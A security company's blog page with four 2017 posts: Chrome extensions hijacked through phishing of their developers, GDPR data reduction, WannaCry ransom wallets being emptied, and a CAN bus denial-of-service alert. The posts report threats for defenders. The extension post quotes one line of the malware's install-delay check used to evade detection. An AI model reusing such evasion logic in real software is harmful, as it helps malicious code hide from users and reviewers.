Wednesday, 13 September 2017

Cyber Criminals Hijack Chrome Extensions and Put 4.7 Million Users at Risk

Developer Accounts of Popular Chrome Extensions Being Hijacked by Cyber Criminals, over 4.7 Million Users Are at a Risk of Cyber Attack

By Stuart Peck, Head of Cyber Security Strategy and Contributor on SecurityAffairs.co

Over 4.7 million users could be at risk after being exposed to malicious adverts and credentials theft due to developer accounts of popular chrome extensions being hijacked by cyber criminals.

A phishing campaign run by Cyber Criminals in July that targeted chrome extension developers, with the purpose of harvesting their Google account credentials, has led to 8 very popular chrome extensions being compromised.

“At the end of July and beginning of August, several Chrome Extensions were compromised after their author’s  Google Account credentials were stolen via a phishing scheme. This resulted in hijacking of traffic and exposing users to potentially malicious popups and credential theft.” reported the analysis of the security firm Proofpoint.

Figure 1 – example of phishing email- source Proofpoint

Using the compromised developer accounts, the threat actors were able to inject code in to the legitimate extensions that would serve its users substituted adverts to adult websites, windows repair scams, and in some cases credentials harvesting. Research conducted by Proofpoint reported that the affected extensions include:
  • Web Developer- 1,044,016 users
  • Chrometana- 597, 577 users
  • Infinity New Tab- 476, 803 users
  • CopyFish- 37,397 uses
  • Web Paint- 53,930 users
  • Social Fixer- 182, 083 users
  • TouchVPN- 1,031,690 users
  • Betternet VPN- 1, 334,517 users
Some of the tactics used by the threat actors were to check whether the Chrome Extension had been installed for 10 minutes – commonly thought to bypass detection.

if ((Date.now() – installed) > 10 * 60 * 1000)

This check was made before proceeding with the rest of the extension code which resulted in retrieving a remote file “ga.js” from a server which the domain is generated via DGA (Domain Generation Algorithm), this call is made over HTTPS.

One of the objectives of compromised version of the extension was to attempt to substitute legitimate adverts on the victim’s browser, hijacking traffic from legitimate advertising networks and replacing with services (usually adult in nature), that the threat actors would profit from.

“While the attackers substituted ads on a wide range of websites, they devoted most of their energy to carefully crafted substitutions on adult websites” continues Proofpoint.

The adverts worked for a specific set of 33 banner sizes shown in the code snippet from 973820_BNX.js?rev=133 below:


Figure 2 Banner size for substituted malicious adverts source Proofpoint

Also, it was noted in the research conducted by Proofpoint concluded that similar pop up alerts known to be associated with the compromise of Infinity New Tab extension in May and fake EU cookie-consent alert last year were also found in this campaign.

In summary, attackers are increasingly targeting developers through a phishing email, as a way to gain access to a large user base to quickly generate traffic to their affiliate schemes or gather credentials than can be later harvested for profit.

This is a worrying trend and developers need to be more aware of the increased risks, it was only 6 months ago when researchers discovered that attackers were targeting developers of Github repositories to gain access to fintech or high tech companies.

The tactics on display in this particular campaign are not necessarily new but demonstrate the potential widespread impact of the phishing emails, but a question that hasn’t really been answered is why didn’t the developers have 2FA for their Google developer accounts?

Databergs…Are You On Course for a Titanic Sinking?


By Will Lambert, Pre/Post Sales Cyber Security Consultant, ZeroDayLab Limited
As you power through the globe’s business oceans, navigating oceans of regulatory and legal compliance are you on course for a business-sinking crash with a databerg?  The captain of your ship probably knows databergs are there but are you adequately prepared to hinder or reduce the damage a databerg could inflict?

This is not going to be another blog talking about EUGDPR but it is on the horizon and would therefore be irrational for me not to mention it. Under EU GDPR, Article 35 states that you must not hold excessive amounts of data.  Be aware, even if you deal mainly with the UK,  this is likely to become UK law long past Britain sets sail from the EU in March 2019. According to a statement by Elizabeth Denham – UK Information Commissioner at the ICO in Cheshire,

“The big question is what happens when the UK leaves the EU. The legal relationship answers are for government to give – I’m a regulator, independent of government - but they’ve made it clear that EU law will remain UK law, until the Government sees fit to repeal it.”

This is not just about EUGDPR anymore, look past March 2019. Steps need to be as soon as possible to chip away at your databerg so it is a more manageable and preferably fine-avoidable, or at least a fine-reducing size.

What is Your Databerg?
When discussing data, there are mainly three types of data: Structured, Unstructured and Semi-Structured. Simply put, Structured data is easily searched by relational databases and can be indexed and investigated using search strings. Overall, structured data is something machines can easily understand. Unstructured is almost everything else. Think of unstructured data as data that is written, or presented for humans to understand easily. Muddying the waters a little, Semi-Structured data is Unstructured documents that allow indexing and investigation by search strings; usually by adding tags. This tagging element (usually metadata) allows specific elements of the data to be addressed and located by using search strings. Common metadata includes, Name, Date Created or Owner.

85% of Your Data is of No Use To Your Organisation
The reality is only a small proportion of data is readily seen or used by organisations. In fact, the Veritas Databerg Survey 2016 states that a huge 85% of stored data is Dark, Redundant, Obsolete or Trivial!  85% of your data is essentially of no use to your organisation.  A huge proportion of your data is potentially being stored and maintained for no business gain and if it’s not removed, it could tear a hole in your hull letting a flood of fines sink your business.

I can almost hear you shouting at me, “but, we have to keep certain data!”. Yes, that’s true. You do have certain regulatory and legal requirements for keeping data but without performing detailed and meticulous data analytics and discovery, how do you know what you need to keep and what can be, or needs to be removed? Therefore, it is important to locate Dark, Redundant, Obsolete and Trivial (ROT) data.

The Value of Dark Data is Unknown to Your Organisation
Dark data is data you do not even know exists and therefore neither a quantative or qualitive value can be attributed to it. It is also data you do know is there but are unsure what it is.  The tradition has been to ‘keep it, just in case’ for data where you are unable to identify the person or responsible role for the data.  However, this reasoning is unlikely to be accepted under EU GDPR.
How Much Duplicated Data Exists?

Redundant data means asking what level of duplication exists.  Do you really need to keep file X five times? Furthermore, what backups have been carried out on the system and what level of duplication exists within those backups? Many businesses are backing up the same area or files more than is necessary.

What is Past its Use-By Date?
Obsolete data involves analysing its ageing characteristics. If a file was created in 2005 and not modified since 2009…. does it still necessitate keeping? Be aware, this range of “obsolete” files would require consultation with Legal before their removal to keep in line with regulatory and legal requirements.

Trivial or Vital?
You should have a good idea of what file extensions should make up your databerg and what is classed as ‘trivial’ and unimportant.  If your business produces mainly documents, you could argue that picture files are required but what about film and audio files? If they are not important, chip these file types off your databerg!

Where do You Start the Journey?
A decent data discovery exercise will not only show you what data you have and where it is but also looks at ageing statistics showing how much data you have presently and how much you had in the past.  From those statistics, you can project your organisation’s future databerg if nothing is done. I’m sure you will agree; this level of analytics will come in extremely handy when writing business cases for the necessary tools needed to scale and hack away at your company’s databerg.

Reduction is not just about the compliance with EU GDPR, it also affects budgets.  Certain expenditures will always be associated to data. Power and storage costs are just the start. Storage is becoming cheaper by the day but why pay for X when you only need half the amount?
Plus, if the 85% figure is to be believed…. well those are fractions I can’t do but we can agree – that’s a massive saving. What if your organisation makes use of Infrastructure as a Service (IaaS) cloud storage solutions? Cloud providers tend to be charge around between $26 - $155 pcm per user for 1TB storage. Reduce this down to 100GB, the charge reduces from $4 - $33 pcm. Again, it’s quite the saving. (All prices compared at cloudorado.com)

The identification of the content of your databerg is the first step and must be completed before grabbing crampons and ice axes to begin ploughing through the data.  Remember, if you find yourself in the unfortunate position of being breached, having carried out data discovery and taken steps to reduce your databerg, this can only ever be looked upon favourably by any governing body. The moral of the story is: switch on the radar, identify the size of the risk and while it’s a long, arduous and monotonous journey it’s better to reduce the databerg than letting your organisation be the next titanic sinking.

Tuesday, 5 September 2017

WannaCry Authors Withdraw $143,00 from Bitcoin Wallets While World is Distracted!

Wannacry Authors Make a $143,000 Withdrawal from Bitcoin Wallets, Whilst the Internet is Distracted!

By Stuart Peck, Head of Cyber Security Strategy, ZeroDayLab & Contributor to SecurityAffairs.co
Previously published - 5th August 2017

On Wednesday some very interesting and seemly unrelated events happened in regards to Wannacry. First Marcus Hutchins (AKA @Malwaretech), the security researcher who discovered the kill switch and stopped the spread of Wannacry was arrested whilst returning to the UK from Las Vegas- on suspicion of creating malware (covered here).

But the second event which will be covered in the article related to an event that seemed to of passed most of Twitter and the internet by. The WannaCry wallets from the orchestrators behind the ransomware outbreak (that famously affected companies globally including the NHS), were emptied to the tune of $143,000. Interestingly the Bitcoin generated through ransom payments from the global attack had not been touched until Wednesday.

A twitter bot created by Quartz, to monitor the wallets for payments during the original outbreak, first noticed the activity at 11:10pm ET, according to the twitter account a total of $70,000 was withdrawn from the following three transactions:

7.34128314 BTC ($20,055.52 USD) has just been withdrawn from a bitcoin wallet tied to #wcry ransomware. https://t.co/wX2k9pJLNQ
— actual ransom (@actual_ransom) August 3, 2017
 8.73261636 BTC ($23,856.48 USD) has just been withdrawn from a bitcoin wallet tied to #wcry ransomware. https://t.co/KRxgNpBGgz
— actual ransom (@actual_ransom) August 3, 2017
 9.67641378 BTC ($26,434.83 USD) has just been withdrawn from a bitcoin wallet tied to #wcry ransomware. https://t.co/CJLiu6cyvr
— actual ransom (@actual_ransom) August 3, 2017
Source QZ.com

The twitter bot the reported only 15 minutes later that the remainder of the monies were moved from the Bitcoin wallets, it is highly likely that these were laundered using a mixing service making it very hard to track the source and destination of the payments through making a high volume of small transactions to a large number of wallets.


Given the orchestrators of the Wannacry outbreak is widely suspected to be the Lazarus Group which have connections to North Korea, the timing and motivation of the BTC exfiltration could be a dig towards Marcus Hutchins, who stopped the spread of the attack, or just a coincidence, at this juncture there is no evidence to call it either way.

But it is also known that Lazarus, in particular, Bluenoroff are a financially motivated group, with the attacks on banks, financial, and trading companies in Bangladesh in 2014 and the now famous $81million Cyber-Heist of the Bangladesh central bank’s account at the Federal Reserve Bank of New York.

In summary, with the attackers behind Wannacry and NotPetya thought by many not to be financially motivated, it seems that even they still could not resist the opportunity to silently move their ill-gotten gains, whist the internet was distracted by other events!

Wednesday, 30 August 2017

ICS-CERT Issues Warning of CAN Bus Vulnerability

The US ICS-CERT issued an alert in response to a public report of a vulnerability in the Controller Area Network BUS (CAN BUS).

By Stuart Peck, Head of Cyber Security Strategy, ZeroDayLab
On Friday (28th of July), the Industrial Controls Systems Cyber Emergency Team or ICS-CERT, issued an alert in response to a public report of a vulnerability in the Controller Area Network (CAN), Bus standard.
The vulnerability detailed in the alert is a stealth Denial of Service attack that requires physical access to the CAN, and an attacker with extensive knowledge of how to reverse engineer the traffic. This ultimately results in the disruption of the availability of arbitrary functions of the target device.

The public report that is referenced in the ICS-CERT alert is from a group of Italian security researchers from Politecnico di Milano (the largest technical university in Italy), in their report the researchers detail how “modern vehicles incorporate tens of electrical control units (ECU’s) , driven by, according to estimates, as much as 100,000,000 lines of code. They are tightly interconnected via internal networks, mostly based upon the CAN bus standard…”.

The report presents how the denial-of-service attack against the CAN bus standard is harder to detect, because it exploits the design of the CAN protocol at a low level. This allows an attacker to target malfunctions in safety-critical components or disable vehicle functionalities such as power steering or airbags for example.

The attack exploits the weakness in the CAN protocol, working between the physical and data link layers of the OSI stack without requiring any message sending capability to the attacker.
It is important to note that the research conducted in the report concluded that this attack is completely undiscoverable without a major restructure of the CAN bus networks, which is widely adopted in automotive, manufacturing, building automation, and hospitals.
A full proof of concept of the CAN denial-of-service was posted on Github, the project titled “A Stealth, Selective, Link-layer Denial-of-Service Attack Against Automotive Networks” proves the attack detailed in the paper released by Politecnico di Milano. The attack was delivered against a Alfa Romeo Giulietta using a Arduino Uno Rev 3 to disable the parking sensor module (identifier 06314018) on CAN B operating at 29 bit / 50 kbps.


In summary, this exploit focuses on recessive and dominate bits to cause malfunctions in CAN nodes rather than complete frames, which have been found in previously reported attacks which can be detected by IDS/IPS systems unlike this attack.

Because of how the denial of service attack exploits the design of the CAN protocol, and how easily an input port (typically ODB-II), can be accessed by a potential attacker the recommendation from ICS-CERT is to limit access to these input ports. They are also working with the automotive industry and other industries to strategize mitigation plans.

Finally, given how widely CAN bus is adopted by the automotive, healthcare, and manufacturing industries this further highlights how singular weaknesses in a secure environment can compromise the network as a whole.